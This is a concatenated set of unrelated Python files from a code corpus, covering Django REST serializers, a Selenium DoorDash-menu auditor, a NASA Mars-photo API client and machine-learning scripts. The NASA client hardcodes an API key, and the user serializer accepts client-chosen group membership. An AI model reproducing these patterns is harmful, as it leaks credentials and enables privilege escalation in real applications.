\"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.7\",\n)\n","sub_path":"src/setup_.py","file_name":"setup_.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231162740","text":"from 
django.contrib.auth.models import Group\nfrom rest_framework import serializers\n\nfrom .models import *\n\n# admin endpoints\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ('id', 'name', )\n\n def validate_name(self, name):\n return name\n\n\nclass UserSerializer(serializers.ModelSerializer):\n # groups = GroupSerializer(many=True, required=False, allow_null=True)\n\n class Meta:\n model = User\n fields = ('username', 'password', 'first_name', 'last_name', 'email', 'groups')\n read_only_fields = ('is_staff', 'is_superuser', 'is_active', 'date_joined',)\n\n def create(self, validated_data):\n password = validated_data.pop('password')\n groups = validated_data.pop('groups')\n\n u = User.objects.create(**validated_data)\n u.set_password(password)\n u.save()\n\n if groups:\n for g in groups:\n group = Group.objects.get(id=g)\n u.groups.add(group)\n else:\n group = Group.objects.get(name__icontains='customer')\n u.groups.add(group)\n\n return u\n\n def update(self, instance, validated_data):\n groups = validated_data.pop('groups')\n\n instance.groups.clear()\n\n for g in groups:\n group = Group.objects.get(name__icontains=g.name)\n instance.groups.add(group)\n\n instance.username = validated_data['username']\n instance.first_name = validated_data['first_name']\n instance.last_name = validated_data['last_name']\n instance.email = validated_data['email']\n\n instance.save()\n\n return instance\n\n\n# other endpoints\nclass ImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImage\n fields = ('id', 'image', 'product_item')\n\n def get_group_names(self):\n user = self.context['request'].user\n user_groups = user.groups.all()\n group_names = []\n\n for u in user_groups:\n group_names.append(u.name)\n\n return group_names\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n if 'product_manager' in self.get_group_names():\n image = ProductImage.objects.create(**validated_data)\n image.save()\n Task.objects.create(description='User ' + user.username + 'has created image.', security_level='M').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to create images')\n return image\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if 'product_manager' in self.get_group_names():\n instance.product_item = validated_data['product_item']\n instance.save()\n Task.objects.create(description='User ' + user.username + 'has updated image.', security_level='M').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update images')\n\n return instance\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ('id', 'name', 'product_item')\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n tag = Tag.objects.get_or_create(**validated_data)\n tag.save()\n Task.objects.create(description='User ' + user.username + 'has created a tag.', security_level='L').save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update products')\n\n return tag\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n instance.name = validated_data['name']\n instance.product_item = validated_data ['product_item']\n instance.save()\n Task.objects.create(description='User ' + user.username + 'has updated a tag.', security_level='L').save()\n else:\n raise 
serializers.ValidationError('You need to be a staff user to update products')\n\n return instance\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n images = ImageSerializer(many=True)\n tags = TagSerializer(many=True)\n\n class Meta:\n model = Product\n depth = 1\n fields = ('id', 'title', 'description', 'postdate', 'price', 'images', 'tags')\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n validated_data.pop('images')\n if user.is_staff:\n product = Product.objects.create(**validated_data)\n product.save()\n Task.objects.create(description='User ' + user.username + ' has created a new product.', security_level='H')\\\n .save()\n else:\n raise serializers.ValidationError('You need to be a staff user to create products')\n return product\n\n def update(self, instance, validated_data):\n user = self.context['request'].user\n\n if user.is_staff:\n instance.title = validated_data['title']\n instance.description = validated_data['description']\n instance.price = validated_data['price']\n instance.save()\n Task.objects.create(description='User ' + user.username + ' has updated product.', security_level='H')\\\n .save()\n else:\n raise serializers.ValidationError('You need to be a staff user to update products')\n\n return instance\n\n\nclass PurchasedProductSerializer(serializers.ModelSerializer):\n price = serializers.FloatField(source='product.price')\n product_id = serializers.IntegerField(source='product.id')\n product_name = serializers.CharField(source='product.title')\n\n class Meta:\n model = PurchasedProduct\n fields = ('id', 'product_id', 'product_name', 'quantity', 'price')\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n p = PurchasedProduct.objects.create(**validated_data)\n p.save()\n Task.objects.create(description='User ' + user.username + ' has purchased item ' 
+ str(p.product_id), security_level='H').save()\n return p\n\n\nclass ReceiptSerializer(serializers.ModelSerializer):\n product = PurchasedProductSerializer(source='purchasedproduct_set', many=True)\n\n class Meta:\n model = Receipt\n fields = ('id', 'customer', 'product', 'total_charge')\n\n def create(self, validated_data):\n user = self.context['request'].user\n products = validated_data.pop('purchasedproduct_set')\n\n total_charge = 0\n\n r = Receipt.objects.create(customer=self.context['request'].user,**validated_data)\n\n for product in products:\n p = Product.objects.get(id=product.pop('product')['id'])\n purchased = PurchasedProduct.objects.create(receipt=r, product=p, quantity=product.get('quantity'))\n r.purchasedproduct_set.add(purchased)\n total_charge += (p.price * product.get('quantity'))\n\n r.total_charge = total_charge\n r.save()\n Task.objects.create(description='User ' + user.username + ' has generated receipt').save()\n\n return r\n\n\nclass UserInformationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserInformation\n fields = '__all__'\n\n def create(self, validated_data):\n\n user = self.context['request'].user\n\n userModel = UserInformation.objects.create(**validated_data, user=user)\n userModel.save()\n Task.objects.create(description='User ' + user.username + ' has created address.').save()\n\n return userModel\n\n\nclass TaskSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Task\n fields = '__all__'\n","sub_path":"productapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"184281058","text":"#Imports\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import ImageDraw, Image\r\n\r\ndef Sort_Tuple(tup): \r\n\treturn(sorted(tup, key = lambda x: x[2],reverse = True))\r\n\r\ndef plot_boxes(output_location, image, pred): # Write the required arguments\r\n\r\n\t# The function should plot the predicted boxes on the images and save them.\r\n\t# Tip: keep the dimensions of the output image less than 800 to avoid RAM crashes.\r\n\timage = Image.fromarray((np.transpose(image,(1,2,0))*255).astype(np.uint8))\r\n\t#pred = zip(pred_boxes, pred_class, pred_score)\r\n\tn = len(pred[1])\r\n\r\n\tif n<=5:\r\n\t\tfor i in range(n):\r\n\t\t\ttext = pred[1][i]\r\n\t\t\tshape = pred[0][i]\r\n\t\t\timg = ImageDraw.Draw(image)\r\n\t\t\timg.text([shape[0][0],shape[1][1]],text)\r\n\t\t\timg.rectangle(shape, outline = 'red')\r\n\t\timage.save(output_location)\r\n\t\treturn image\r\n\r\n\telse:\r\n\t\ti = 0\r\n\t\twhile i<5:\r\n\t\t\tmaxi = 0\r\n\t\t\tmax = 0\r\n\t\t\tfor j in range(n):\r\n\t\t\t\tif pred[2][j]>max:\r\n\t\t\t\t\tmax = pred[2][j]\r\n\t\t\t\t\tmaxi = j\r\n\t\t\ttext = pred[1][maxi]\r\n\t\t\tshape = pred[0][maxi]\r\n\t\t\timg = ImageDraw.Draw(image)\r\n\t\t\timg.text([shape[0][0],shape[1][1]],text)\r\n\t\t\timg.rectangle(shape, outline = 'red')\r\n\t\t\tpred[2][maxi] = -2\r\n\t\t\ti+=1\r\n\t\timage.save(output_location)\r\n\t\treturn image\r\n\t\t","sub_path":"Python_DS_Assignment/AssignmentQs2/my_package/analysis/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582109262","text":"from cx_Freeze import setup, Executable\n\nbuild_exe_options = {\"packages\": ['os', 'cffi', 'idna']}\n\n\nsetup(name=\"freeradius user management\",\n version=\"0.1\",\n description=\"Software for user 
management in freeRadius\",\n options={\"build_exe\": build_exe_options},\n executables=[Executable(\"main.py\", base=\"Win32GUI\")])","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150949247","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\nclass Item:\n \"\"\"Object representing one DoorDash item\"\"\"\n def __init__(self, name, description, modifier_groups):\n self.name = name\n self.description = description\n self.modifier_groups = modifier_groups\n self.template_item = None\n def addModifierGroup(self, group):\n self.modifier_groups.append(group)\n def getIssues(self):\n \"\"\"Returns list of Issue objects corresponding to all of the issues with the Item and its child ModifierGroup objects\"\"\"\n real_groups = self.modifier_groups.copy()\n template_groups = self.template_item.modifier_groups.copy()\n\n output = []\n if(self.description != self.template_item.description):\n output.append(Issue(\"Item\", self.template_item.name, \"Incorrect description: menu lists '\" + self.description + \"' instead of '\" + self.template_item.description))\n groups_to_compare = []\n for t_group in template_groups:\n if(t_group.name in [i.name for i in real_groups]):\n real_groups[[i.name for i in real_groups].index(t_group.name)].template_group = t_group\n groups_to_compare.append(real_groups[[i.name for i in real_groups].index(t_group.name)])\n else:\n output.append(Issue(\"Modifier Group\", self.name, t_group.name + \" is missing!\"))\n for r_group in real_groups:\n if(r_group.name not in [i.name for i in groups_to_compare]):\n output.append(Issue(\"Modifier Group\", self.name, \"Extraneous modifier group \" + r_group.name + \" found\"))\n for g in groups_to_compare:\n output.extend(g.getIssues(g.template_group))\n return output\n\nclass ModifierGroup:\n \"\"\"Object representing a modifier group on DoorDash\"\"\"\n def __init__(self, name, modifiers):\n self.name = name\n self.modifiers = modifiers\n self.parent = None\n self.template_group = None\n def addModifier(self, modifier):\n self.modifiers.append(modifier)\n def getIssues(self, template_group):\n \"\"\"Returns a list of Issue objects corresponding to the discrepancies between self and template_group\"\"\"\n self.template_group = template_group\n output = []\n if(self.name != self.template_group.name):\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Name does not match template\"))\n if(len(self.modifiers) < len(self.template_group.modifiers)):\n missing = set(self.template_group.modifiers) - set(self.modifiers)\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Missing modifiers\"))\n elif(len(self.modifiers) > len(self.template_group.modifiers)):\n output.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Too many modifiers\"))\n else:\n o=[]\n if(self.modifiers != self.template_group.modifiers):\n for i in range(0, len(self.modifiers)):\n if(sorted(self.modifiers)[i] != sorted(self.template_group.modifiers)[i]):\n o.append(Issue(\"Modifier\", self.parent.name + 
\"/\" + self.template_group.name, \"Menu lists modifier as \" + sorted(self.modifiers)[i] + \" instead of \" + sorted(self.template_group.modifiers)[i]))\n if(not o):\n pass\n #o.append(Issue(\"Modifier Group\", self.parent.name + \"/\" + self.template_group.name, \"Modifiers scrambled within modifier group - adjust order of modifiers to match template\"))\n output.extend(o)\n return output\n\nclass Issue:\n \"\"\"Object representing one issue with a menu\"\"\"\n def __init__(self, level, location, body):\n self.level = level\n self.location = location\n self.body = body\n def output(self):\n return self.level + \" - \" + self.location + \" - \" + self.body\n\nclass Menu:\n \"\"\"Object representing a DoorDash Menu\"\"\"\n def __init__(self, address, template_menu):\n self.items = []\n self.categories = []\n self.address = address\n self.template_menu = template_menu\n self.issues = []\n def loadItems(self, deep_link):\n \"\"\"Scrapes DoorDash menu page for all the necessary data and loads it into Item and ModifierGroup objects within the Menu object\"\"\"\n #Load webpage\n driver = webdriver.Chrome(executable_path=\"C:/Users/creek/Desktop/ChromeDriver/chromedriver.exe\")\n driver.get(deep_link)\n\n #Enter address\n dummy = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"input[placeholder='Address']\")))\n time.sleep(1)\n address_field = driver.find_element_by_css_selector(\"input[placeholder='Address']\")\n address_field.send_keys(self.address)\n time.sleep(0.5)\n address_field.send_keys(Keys.ENTER)\n time.sleep(1)\n driver.find_element_by_css_selector(\"button[data-anchor-id='AddressEditSave']\").click()\n time.sleep(1)\n\n #Load categories\n category_list = driver.find_elements_by_css_selector(\"h2[data-category-scroll-selector]\")\n category_texts = [e.text for e in category_list]\n try:\n category_texts.remove(\"Popular Items\")\n except:\n pass\n self.categories = category_texts\n print(self.categories)\n\n #Load items\n #items are located by searching rectangular buttons\n item_button_list = driver.find_elements_by_xpath(\"//button[@shape='Rectangle']\")\n actions = ActionChains(driver)\n for i in item_button_list:\n #moves item listing to center of page\n driver.execute_script(\"var viewPortHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);\"\n + \"var elementTop = arguments[0].getBoundingClientRect().top;\"\n + \"window.scrollBy(0, elementTop-(viewPortHeight/2));\", i)\n \n #click on item\n i.click()\n\n #wait until close item listing button is on page to move on\n dummy = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"button[aria-label*='Close']\")))\n \n #header_description holds the text for the title and description\n header_description = i.text.split(\"\\n\")\n item_title = header_description[0]\n\n #if there is a description pull it, otherwise no description\n try:\n item_description = header_description[1]\n except:\n item_description = \"\"\n # header_description = driver.find_elements_by_css_selector(\"span[overflow='normal'][display='block']\")\n # item_title = header_description[0].text\n # item_description = header_description[1].text\n close = driver.find_element_by_css_selector(\"button[aria-label*='Close']\")\n\n #if the item has already been loaded, don't load it again (Popular Items section)\n if item_title in [i.name for i in self.items]:\n close.click()\n continue\n\n print(\"Item Title: \" + item_title)\n print(\"Item Description: \" + item_description)\n 
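 # A sturdier wait than a fixed sleep (sketch; reuses the WebDriverWait/EC/By\n # imports and the modal selector already used in this file):\n # WebDriverWait(driver, 10).until(EC.presence_of_element_located(\n # (By.CSS_SELECTOR, \"div[data-anchor-id='MenuItemModalBody']\")))\n 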
time.sleep(0.5)\n menu_modal_body = driver.find_element_by_css_selector(\"div[data-anchor-id='MenuItemModalBody']\")\n mgroups = []\n try:\n modifier_groups = menu_modal_body.find_elements_by_css_selector(\"div[role='group']\")\n for group in modifier_groups:\n modifier_containers = group.find_elements_by_xpath(\"*\")\n #print([mod.get_attribute(\"innerHTML\") for mod in modifier_containers])\n group_title_container = modifier_containers.pop(0).find_element_by_css_selector(\"div\").find_elements_by_css_selector(\"span\")\n group_title = group_title_container[0].text\n group_number_tag = group_title_container[1].text\n modifiers = []\n for div in modifier_containers:\n #print(div.get_attribute('innerHTML'))\n modifiers.append(div.find_element_by_css_selector(\"div\").find_element_by_css_selector(\"span\").text)\n #print(\"Modifier group: \" + group_title)\n #print(\"Number tag: \" + group_number_tag)\n # for modifier in modifiers:\n # #print(modifier)\n # pass\n mgroups.append(ModifierGroup(group_title, modifiers))\n except NameError:\n print(\"no modifiers for this item\")\n item = Item(item_title, item_description, mgroups)\n\n #MG object needs to know its parent to generate correct location in getIssues()\n for mgroup in item.modifier_groups:\n mgroup.parent = item\n \n self.items.append(item)\n close = driver.find_element_by_css_selector(\"button[aria-label*='Close']\")\n close.click()\n time.sleep(0.5)\n driver.close()\n def compare(self):\n \"\"\"Compares the loaded menu with a template (set by the template_menu property) and outputs a list of Issue objects\"\"\"\n real_items = self.items.copy()\n template_items = self.template_menu.items.copy()\n real_categories = self.categories.copy()\n template_categories = self.template_menu.categories.copy()\n output = []\n\n items_to_compare = []\n\n #compare categories\n to_remove = [\"Drinks\", \"Desserts\", \"Beverages\"]\n for r in to_remove:\n try:\n real_categories.remove(r)\n except:\n pass\n\n for t_category in template_categories:\n if(t_category not in real_categories):\n output.append(Issue(\"Category\", t_category, t_category + \" is missing!\"))\n for e_category in real_categories:\n if(e_category not in template_categories):\n output.append(Issue(\"Category\", e_category, \"Category \" + e_category + \" not on template menu\"))\n \n if(self.categories[0] != \"Bao\"):\n output.append(Issue(\"Category\", \"Layout\", \"First category on menu not Bao\"))\n\n #compare lists of items\n for t_item in template_items:\n if(t_item.name in [i.name for i in real_items]):\n real_items[[i.name for i in real_items].index(t_item.name)].template_item = t_item\n items_to_compare.append(real_items[[i.name for i in real_items].index(t_item.name)])\n else:\n output.append(Issue(\"Item\", t_item.name, t_item.name + \" is missing!\"))\n for r_item in real_items:\n if(r_item.name not in [i.name for i in items_to_compare]):\n output.append(Issue(\"Item\", r_item.name, \"Extraneous item \" + r_item.name + \" found\"))\n \n print(\"Comparing \" + str(len(items_to_compare)) + \" items\")\n\n #compare each item\n #TODO: make this use inheritance and polymorphism and all that jazz to not fucking suck lol\n # for item in items_to_compare:\n # if(item.modifier_groups and item.template_item.modifier_groups):\n # for i in range(min(len(item.modifier_groups), len(item.template_item.modifier_groups))):\n # item.modifier_groups[i].template_group = item.template_item.modifier_groups[i]\n for item in items_to_compare:\n output.extend(item.getIssues())\n\n \n issues = 
output\n \n return output\n \n \n\n\n\n \n ","sub_path":"MenuAuditmator.py","file_name":"MenuAuditmator.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440865186","text":"import requests\nimport json\nimport os\n\nclass ImageSourcer:\n\n # Constructor initialising attributes\n def __init__(self, rover, sol, camera, index):\n apiKey = \"lORFMg7rox7XMLBWzM1byE9fd5WAe3Cf9KkoQYmp\"\n self.rover = rover\n self.sol = sol\n self.camera = camera\n self.responseString = (\"https://api.nasa.gov/mars-photos/api/v1/rovers/\" + self.rover + \"/photos?sol=\"\n + self.sol + \"&camera=\" + self.camera + \"&api_key=\" + apiKey)\n self.index = index\n\n def __call__(self):\n return (self.index)\n\n # Write links to images to text file\n '''def writeToFile(self, data, fileName):\n textFile = open(fileName, \"w\")\n for entry in data[\"photos\"]:\n print(entry[\"img_src\"])\n textFile.write(entry[\"img_src\"])\n textFile.write(\"\\n\")'''\n\n def returnURL(self, data):\n return data[\"photos\"][self.index][\"img_src\"]\n\n # Send API request for JSON object\n def receiveImages(self):\n response = requests.get(self.responseString)\n\n # Check to see if request OK\n if (response.status_code != 200):\n print (\"API Request failed\")\n else:\n data = response.json()\n\n # Create file name and store in folder 'images'\n fileName = self.rover + \"-\" + self.sol + \".txt\"\n completeFileName = os.path.join(\"images/\", fileName)\n\n # Remove the file if it already exists for these parameters, so\n # fresh data can be retrieved, then return the image URL\n if (os.path.isfile(completeFileName)):\n os.remove(completeFileName)\n\n return self.returnURL(data)\n\n\n#img1 = ImageSourcer(\"Curiosity\", \"1000\", 0)\n#link = img1.receiveImages()\n#print(link)\n","sub_path":"SpaceHack/ImageSourcer.py","file_name":"ImageSourcer.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268884109","text":"import os\nimport glob\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf\nimport gpflow\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ntrain_path = './conll_train'\ndev_path = './conll_dev'\n\nnp.random.seed(1)\n\ndef Load_Data(A, Comp_dims, path='./conll_train', sample = None, replace = False):\n x_comp_data = []\n y_label = []\n name = path.split(\"_\")[-1]\n print(f\"Loading {name} Data...\")\n dir = os.path.dirname(__file__)\n\n x_file_list = glob.glob(os.path.join(dir, path + \"/*.x\"))\n y_file_list = glob.glob(os.path.join(dir, path + \"/*.y\"))\n\n if sample == None:\n pass\n else:\n Num = len(x_file_list)\n sam_ind = np.random.choice(range(Num), round(sample * Num), replace = replace)\n x_file_list = [x_file_list[I] for I in sam_ind]\n y_file_list = [y_file_list[I] for I in sam_ind]\n \n print(f\"Parsing {len(x_file_list)} xfiles and {len(y_file_list)} yfiles.\")\n\n\n for X, y in list(zip(x_file_list, y_file_list)):\n len_of_y = 0\n with open(y, \"r\") as yf:\n y_content = [int(row.strip()) for row in yf.readlines()]\n len_of_y = len(y_content)\n y_label.append(y_content)\n\n with open(X, \"r\") as xf:\n compX = []\n content = [row.strip() for row in xf.readlines()]\n for ind in range(1, len_of_y + 1):\n X_data = np.mat(np.zeros((Comp_dims, 1)))\n for c in content:\n tran = [int(t) for t in c.split()]\n if tran[0] == ind:\n X_data += A[:, tran[1]]\n if compX == []:\n compX = X_data\n else:\n compX = 
np.concatenate([compX, X_data], axis = 1)\n \"\"\"\n the label is like:\n 0 2\n the X data is like: shape like (Comp_dims, len of label)\n [[18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]\n [18. 2.]]\n \"\"\"\n x_comp_data.append(compX.T)\n Y = np.concatenate(y_label, axis = 0)\n Y = np.array(Y, dtype = np.float64)\n Y = Y[:, None]\n\n return np.concatenate(x_comp_data, axis = 0), Y\n\n\ndef softmax_classifier(input_data, label, Comp_dims, class_num, X_test, y_test):\n # print(input_data.shape)\n # print(label.shape)\n input_in = tf.placeholder(tf.float32, shape=(None, Comp_dims), name=\"input_data\")\n lab = tf.placeholder(tf.int32, shape=(None,), name=\"label\")\n\n # the loss below applies softmax itself, so this layer must output raw logits\n pred = tf.layers.dense(input_in, class_num)\n # print(pred.get_shape())\n y_label = tf.one_hot(lab, class_num)\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(\n logits = pred, \n labels = y_label\n )\n loss = tf.reduce_mean(cross_entropy, name = \"loss\")\n opt = tf.train.AdamOptimizer(0.1).minimize(loss)\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(pred, 1), tf.argmax(y_label, 1)), dtype = tf.float32), name = \"accuracy\")\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as s:\n s.run(init)\n s.run(opt, feed_dict={input_in: input_data, lab: label})\n train_acc = s.run(acc, feed_dict={input_in: input_data, lab: label})\n test_acc = s.run(acc, feed_dict={input_in: X_test, lab: y_test})\n\n return train_acc, test_acc\n\n\ndef SVGP(X, y, X_test, y_test, C_num, start = 1):\n \"\"\"\n X should look like: (batch_size, dims)\n y should look like: (batch_size, 1) and start with 0, not 1\n \"\"\"\n dims = X.shape[1]\n y = y - start\n\n max_sample = 1700\n\n # sample_rate = 0.3\n sample_num = max_sample if X.shape[0] > max_sample else X.shape[0]\n # print(f\"x shape is {sample_num}\")\n\n sample_index = np.random.choice(range(X.shape[0]), sample_num, replace = False)\n sample_index.sort()\n\n # print(f\"the shape is{sample_index}\")\n\n SVGP = gpflow.models.SVGP(\n X, y, \n kern=gpflow.kernels.RBF(dims) + gpflow.kernels.White(dims, variance = 0.01), \n Z=X[sample_index, :].copy(),\n likelihood=gpflow.likelihoods.MultiClass(C_num), \n num_latent=C_num, \n whiten=True, \n q_diag=True\n )\n\n gpflow.train.ScipyOptimizer().minimize(SVGP)\n\n p_train, _ = SVGP.predict_y(X)\n\n p_test, _ = SVGP.predict_y(X_test)\n\n train_pred = np.argmax(p_train, axis=1) + start\n test_pred = np.argmax(p_test, axis=1) + start\n\n # y was shifted to 0-based above, so shift it back before scoring\n train_acc = accuracy_score(y + start, train_pred)\n test_acc = accuracy_score(y_test, test_pred)\n\n # return pred + start\n return train_acc, test_acc\n\n\ndef main():\n\n D = 2035523\n # define the dimensionality of the given example sparse matrix.\n\n Comp_dims = 90\n # define the dimensionality of the compressed matrix.\n\n Miu = 0\n Sigma = 1\n # A = Miu + np.mat(np.random.randn(Comp_dims, D)) * Sigma\n\n A = np.mat(np.random.normal(Miu, Sigma, (Comp_dims, D)))\n\n # y = A * s, where s is the sparse matrix and 
y holds the compressed measurements.\n\n C = 23\n # C = 22\n\n X_train, y_train = Load_Data(A, Comp_dims, sample=0.05)\n X_dev, y_dev = Load_Data(A, Comp_dims, path=dev_path, sample=0.015)\n\n print(\"free the A memory...\")\n import gc\n del A\n gc.collect()\n\n print(\"start training...\")\n\n # print(y_dev)\n\n train_acc, dev_acc = SVGP(X_train, y_train, X_dev, y_dev, C, 0)\n\n print(f\"the train accuracy is {train_acc}\")\n\n print(f\"the cross validation accuracy is {dev_acc}\")\n\n # print(y_dev_pred)\n\n # train_acc, dev_acc = softmax_classifier(X_train, y_train, Comp_dims, C, X_dev, y_dev)\n\n\nif __name__ == '__main__':\n main()","sub_path":"SVGP_83.py","file_name":"SVGP_83.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522277531","text":"#!/usr/bin/env python\nimport matplotlib as mpl\nmpl.rcParams.update({'font.size': 11, 'font.family': 'serif'})\n# mpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom optparse import OptionParser\nimport os\nimport sys\nimport numpy as np\nimport xarray as xr\nimport dask\nimport dask.array as da\nfrom dask.diagnostics import ProgressBar\nfrom surfvis.utils import flagchisq\nfrom daskms import xds_from_ms, xds_from_table, xds_to_table\n\n\ndef create_parser():\n parser = OptionParser(usage='%prog [options] msname')\n parser.add_option('--rcol', default='RESIDUAL', help='Residual column (default = RESIDUAL)')\n parser.add_option('--wcol', default='WEIGHT_SPECTRUM', help='Weight column (default = WEIGHT_SPECTRUM)')\n parser.add_option('--fcol', default='FLAG', help='Flag column (default = FLAG)')\n parser.add_option('--sigma', default=10, type=float, help='chisq threshold (default = 10)')\n parser.add_option('--nthreads', default=4, type=int, help='Number of dask threads to use')\n parser.add_option('--nrows', default=10000, type=int, help='Number of rows in each chunk (default=10000)')\n parser.add_option('--nfreqs', default=128, type=int, help='Number of frequencies in a chunk (default=128)')\n parser.add_option(\"--use-corrs\", type=str, help='Comma separated list of correlations to use (do not use spaces)')\n return parser\n\ndef main():\n (options,args) = create_parser().parse_args()\n\n # Some error trapping\n if len(args) != 1:\n print('Please specify a single Measurement Set to plot.')\n sys.exit(-1)\n else:\n msname = args[0].rstrip('/')\n\n schema = {}\n schema[options.rcol] = {'dims': ('chan', 'corr')}\n schema[options.wcol] = {'dims': ('chan', 'corr')}\n schema[options.fcol] = {'dims': ('chan', 'corr')}\n\n xds = xds_from_ms(msname,\n columns=[options.rcol, options.wcol, options.fcol],\n chunks={'row': options.nrows, 'chan': options.nfreqs},\n group_cols=['FIELD_ID', 'DATA_DESC_ID', 'SCAN_NUMBER'],\n table_schema=schema)\n\n if options.use_corrs is None:\n print('Using only diagonal correlations')\n if len(xds[0].corr) > 1:\n use_corrs = [0, -1]\n else:\n use_corrs = [0]\n else:\n use_corrs = list(map(int, options.use_corrs.split(',')))\n print(f\"Using correlations {use_corrs}\")\n\n out_data = []\n for i, ds in enumerate(xds):\n resid = ds.get(options.rcol).data\n weight = ds.get(options.wcol).data\n flag = ds.get(options.fcol).data\n\n uflag = flagchisq(resid, weight, flag, tuple(use_corrs), sigma=options.sigma)\n\n out_ds = ds.assign(**{options.fcol: ((\"row\", \"chan\", \"corr\"), uflag)})\n out_data.append(out_ds)\n\n writes = xds_to_table(out_data, msname, 
columns=[options.fcol])\n\n with ProgressBar():\n dask.compute(writes)\n","sub_path":"surfvis/flagchi2.py","file_name":"flagchi2.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"638248956","text":"import time\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn import linear_model as lm\nfrom sklearn.ensemble import RandomForestClassifier as rf\n\nimport sys\n\n\nclass Train():\n def __init__(self, train_data, train_labels, test_data, test_labels):\n self.train_data = train_data\n self.train_labels = train_labels\n self.test_data = test_data\n self.test_labels = test_labels\n\n\n def run(self, parameters, m_name):\n\n #print('# of train:', len(self.train_labels), '# of test:', len(self.test_labels))\n\n start_time = time.time()\n\n if m_name==\"LR\":\n clf = RandomizedSearchCV(lm.LogisticRegression(), parameters, n_iter=50, scoring='f1', n_jobs=-1)\n #clf = RandomizedSearchCV(lm.LogisticRegression(), parameters, n_iter=50, scoring='f1', n_jobs=10)\n elif m_name==\"RF\":\n clf = RandomizedSearchCV(rf(), parameters, n_iter=50, scoring='f1', n_jobs=-1)\n #clf = RandomizedSearchCV(rf(), parameters, n_iter=50, scoring='f1', n_jobs=10)\n clf = clf.fit(self.train_data, self.train_labels)\n #print('Best parameters:\\n', clf.best_params_)\n\n train_time = time.time() - start_time\n #print('Train time:', train_time, '(s)')\n\n\n test_start_time = time.time()\n probs = list(clf.predict_proba(self.test_data))\n fault_probs = [prob[1] for prob in probs]\n\n test_time = time.time() - test_start_time\n\n evaluation_dict = {'Time': [train_time],'test_Time': [test_time]}\n prob_dict = {'Prob': fault_probs, 'Label': self.test_labels, 'BestPara': clf.best_params_}\n\n return evaluation_dict, prob_dict\n\n","sub_path":"RQ2/DP/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28782604","text":"#!/usr/bin/env python\n'''\n@author Luke Campbell \n@date Tue Oct 16 09:14:37 EDT 2012\n@file ion/services/dm/utility/test/test_granule.py\n@brief Tests for granule\n'''\n\nfrom pyon.ion.stream import StandaloneStreamPublisher, StandaloneStreamSubscriber\nfrom pyon.util.int_test import IonIntegrationTestCase\n\nfrom ion.services.dm.inventory.dataset_management_service import DatasetManagementService\nfrom ion.services.dm.utility.granule import RecordDictionaryTool\n\nfrom interface.services.dm.ipubsub_management_service import PubsubManagementServiceClient\nfrom interface.services.dm.idataset_management_service import DatasetManagementServiceClient\n\nfrom gevent.event import Event\nfrom nose.plugins.attrib import attr\n\nimport numpy as 